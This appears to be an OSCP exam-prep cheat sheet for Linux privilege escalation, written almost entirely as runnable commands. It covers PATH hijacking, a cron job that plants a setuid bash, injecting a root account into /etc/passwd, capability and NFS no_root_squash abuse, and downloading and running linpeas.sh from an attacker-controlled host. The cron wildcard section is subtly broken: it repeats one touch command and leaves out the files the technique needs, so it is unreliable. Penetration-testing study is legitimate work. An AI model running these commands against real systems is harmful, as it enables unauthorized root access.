######################################################################
# 05 – LINUX PRIVILEGE ESCALATION (OSCP 2025)
######################################################################

===============================
# 1. Basic Enumeration
===============================
id
whoami
uname -a
cat /etc/os-release
hostname
sudo -l
ss -tunlp
ps aux

===============================
# 2. SUID Enumeration
===============================
find / -perm -4000 -type f 2>/dev/null
for f in $(find / -perm -4000 -type f 2>/dev/null); do echo "[SUID] $f"; done

# Check GTFOBins for every SUID binary.

===============================
# 3. SGID Enumeration
===============================
find / -perm -2000 -type f 2>/dev/null

===============================
# 4. Writable Directories (Privesc Candidates)
===============================
find / -writable -type d 2>/dev/null

===============================
# 5. PATH Hijacking Exploit
===============================
echo "/bin/bash" > /tmp/ping
chmod +x /tmp/ping
export PATH=/tmp:$PATH
sudo ping

===============================
# 6. Cronjob Wildcard Exploit
===============================
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > /tmp/payload.sh
touch /tmp/payload.sh
touch /tmp/payload.sh

Wait for cron → run:
/tmp/rootbash -p

===============================
# 7. /etc/passwd Writable (Root Salary)
===============================
openssl passwd -1 "password"
echo "root2:<hash>:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

===============================
# 8. Capabilities Exploitation
===============================
getcap -r / 2>/dev/null

# Example Python capability:
/usr/bin/python3 = cap_setuid+ep

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

===============================
# 9. NFS No_root_squash Privesc
===============================
# On attacker:
mkdir /tmp/nfsroot
mount -o rw $targetip:/export /tmp/nfsroot

# Place SUID binary:
cp /bin/bash /tmp/nfsroot/bash
chmod +s /tmp/nfsroot/bash

# On target:
./bash -p

===============================
# 10. Exploitable Services Running as Root
===============================
ps aux | grep root
ss -tunlp

Look for custom scripts or binaries owned by root.

===============================
# 11. LinPEAS (Full Automation)
===============================
wget http://$localip/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

######################################################################
# END OF LINUX PRIVESC
######################################################################